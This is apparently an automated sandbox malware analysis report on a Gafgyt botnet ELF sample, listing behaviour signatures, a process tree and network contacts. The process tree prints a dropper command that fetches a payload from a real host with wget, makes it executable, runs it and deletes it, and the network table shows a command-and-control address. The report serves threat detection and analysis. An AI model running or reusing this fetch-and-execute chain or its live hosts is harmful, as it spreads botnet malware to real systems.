Malware Analysis Report

2025-08-05 23:59

Sample ID 240402-bnr8pacd71
Target a508368a916bcc275163c40126bfdcaa26d5dc3294257356f16799a79ed7eebf.elf
SHA256 a508368a916bcc275163c40126bfdcaa26d5dc3294257356f16799a79ed7eebf
Tags
gafgyt
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

a508368a916bcc275163c40126bfdcaa26d5dc3294257356f16799a79ed7eebf

Threat Level: Known bad

The file a508368a916bcc275163c40126bfdcaa26d5dc3294257356f16799a79ed7eebf.elf was found to be: Known bad.

Malicious Activity Summary

gafgyt

Gafgyt family

Detected Gafgyt variant

Changes its process name

Executes dropped EXE

Modifies Watchdog functionality

Reads system routing table

Reads system network configuration

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-02 01:17

Signatures

Detected Gafgyt variant

Description Indicator Process Target
N/A N/A N/A N/A

Gafgyt family

gafgyt

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-02 01:17

Reported

2024-04-02 01:20

Platform

ubuntu2004-amd64-20240221-en

Max time kernel

146s

Max time network

140s

Command Line

[/tmp/a508368a916bcc275163c40126bfdcaa26d5dc3294257356f16799a79ed7eebf.elf]

Signatures

Changes its process name

Description Indicator Process Target
Changes the process name, possibly in an attempt to hide itself sshd /tmp/a508368a916bcc275163c40126bfdcaa26d5dc3294257356f16799a79ed7eebf.elf N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/..... /tmp/..... N/A

Modifies Watchdog functionality

Description Indicator Process Target
File opened for modification /dev/watchdog N/A N/A
File opened for modification /dev/misc/watchdog N/A N/A

Reads system routing table

Description Indicator Process Target
File opened for reading /proc/net/route /tmp/a508368a916bcc275163c40126bfdcaa26d5dc3294257356f16799a79ed7eebf.elf N/A

Reads system network configuration

Description Indicator Process Target
File opened for reading /proc/net/route /tmp/a508368a916bcc275163c40126bfdcaa26d5dc3294257356f16799a79ed7eebf.elf N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/..... /usr/bin/wget N/A

Processes

/tmp/a508368a916bcc275163c40126bfdcaa26d5dc3294257356f16799a79ed7eebf.elf

[/tmp/a508368a916bcc275163c40126bfdcaa26d5dc3294257356f16799a79ed7eebf.elf]

/bin/sh

[/bin/sh -c wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf .....]

/usr/bin/wget

[wget -q http://gay.energy/.../vivid -O .....]

/usr/bin/chmod

[chmod 777 .....]

/tmp/.....

[./.....]

/bin/sh

[/bin/sh ./.....]

/usr/bin/rm

[rm -rf .....]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
MD 85.239.33.129:666 tcp
US 1.1.1.1:53 gay.energy udp
US 1.1.1.1:53 gay.energy udp
US 1.1.1.1:53 connectivity-check.ubuntu.com udp
US 1.1.1.1:53 cdn.fwupd.org udp
US 1.1.1.1:53 cdn.fwupd.org udp
US 151.101.194.49:443 cdn.fwupd.org tcp
US 1.1.1.1:53 _http._tcp.security.ubuntu.com udp
US 1.1.1.1:53 _https._tcp.deb.nodesource.com udp
US 1.1.1.1:53 _http._tcp.nl.archive.ubuntu.com udp
US 1.1.1.1:53 deb.nodesource.com udp
US 1.1.1.1:53 deb.nodesource.com udp
US 1.1.1.1:53 security.ubuntu.com udp
US 1.1.1.1:53 security.ubuntu.com udp
US 1.1.1.1:53 nl.archive.ubuntu.com udp
US 1.1.1.1:53 nl.archive.ubuntu.com udp
US 91.189.91.82:80 security.ubuntu.com tcp
US 104.22.4.26:443 deb.nodesource.com tcp
NL 213.136.12.213:80 nl.archive.ubuntu.com tcp
US 151.101.194.49:443 cdn.fwupd.org tcp
NL 213.136.12.213:80 nl.archive.ubuntu.com tcp
NL 213.136.12.213:80 nl.archive.ubuntu.com tcp
US 1.1.1.1:53 _https._tcp.motd.ubuntu.com udp
US 1.1.1.1:53 motd.ubuntu.com udp
US 1.1.1.1:53 motd.ubuntu.com udp
IE 34.254.182.186:443 motd.ubuntu.com tcp
US 1.1.1.1:53 _https._tcp.esm.ubuntu.com udp
US 1.1.1.1:53 esm.ubuntu.com udp
US 1.1.1.1:53 esm.ubuntu.com udp
US 91.189.91.46:443 esm.ubuntu.com tcp
IE 54.171.230.55:443 motd.ubuntu.com tcp
IE 54.217.10.153:443 motd.ubuntu.com tcp
NL 213.136.12.213:80 nl.archive.ubuntu.com tcp
IE 34.243.160.129:443 motd.ubuntu.com tcp
IE 54.247.62.1:443 motd.ubuntu.com tcp
NL 213.136.12.213:80 nl.archive.ubuntu.com tcp
NL 213.136.12.213:80 nl.archive.ubuntu.com tcp
NL 213.136.12.213:80 nl.archive.ubuntu.com tcp
NL 213.136.12.213:80 nl.archive.ubuntu.com tcp
NL 213.136.12.213:80 nl.archive.ubuntu.com tcp
NL 213.136.12.213:80 nl.archive.ubuntu.com tcp
NL 213.136.12.213:80 nl.archive.ubuntu.com tcp
NL 213.136.12.213:80 nl.archive.ubuntu.com tcp
NL 213.136.12.213:80 nl.archive.ubuntu.com tcp
NL 213.136.12.213:80 nl.archive.ubuntu.com tcp
MD 85.239.33.129:666 tcp
MD 85.239.33.129:666 tcp
MD 85.239.33.129:666 tcp
MD 85.239.33.129:666 tcp
MD 85.239.33.129:666 tcp
MD 85.239.33.129:666 tcp
MD 85.239.33.129:666 tcp
MD 85.239.33.129:666 tcp
US 1.1.1.1:53 connectivity-check.ubuntu.com udp
MD 85.239.33.129:666 tcp

Files

N/A